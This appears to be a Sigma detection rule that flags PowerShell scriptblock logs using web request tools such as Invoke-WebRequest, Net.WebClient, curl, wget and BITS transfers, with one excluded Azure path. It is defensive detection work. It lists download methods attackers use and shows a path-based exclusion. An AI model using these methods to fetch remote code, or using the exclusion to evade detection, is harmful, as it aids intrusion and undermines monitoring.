Usage Of Web Request Commands And Cmdlets - ScriptBlock

 1title: Usage Of Web Request Commands And Cmdlets - ScriptBlock
 2id: 1139d2e2-84b1-4226-b445-354492eba8ba
 3related:
 4    - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d
 5      type: derived
 6status: test
 7description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs
 8references:
 9    - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/
10    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
11author: James Pemberton / @4A616D6573
12date: 2019-10-24
13modified: 2023-01-10
14tags:
15    - attack.execution
16    - attack.t1059.001
17logsource:
18    product: windows
19    category: ps_script
20    definition: 'Requirements: Script Block Logging must be enabled'
21detection:
22    selection:
23        ScriptBlockText|contains:
24            - '[System.Net.WebRequest]::create'
25            - 'curl '
26            - 'Invoke-RestMethod'
27            - 'Invoke-WebRequest'
28            - 'iwr '
29            - 'Net.WebClient'
30            - 'Resume-BitsTransfer'
31            - 'Start-BitsTransfer'
32            - 'wget '
33            - 'WinHttp.WinHttpRequest'
34    filter:
35        Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
36    condition: selection and not filter
37falsepositives:
38    - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.
39level: medium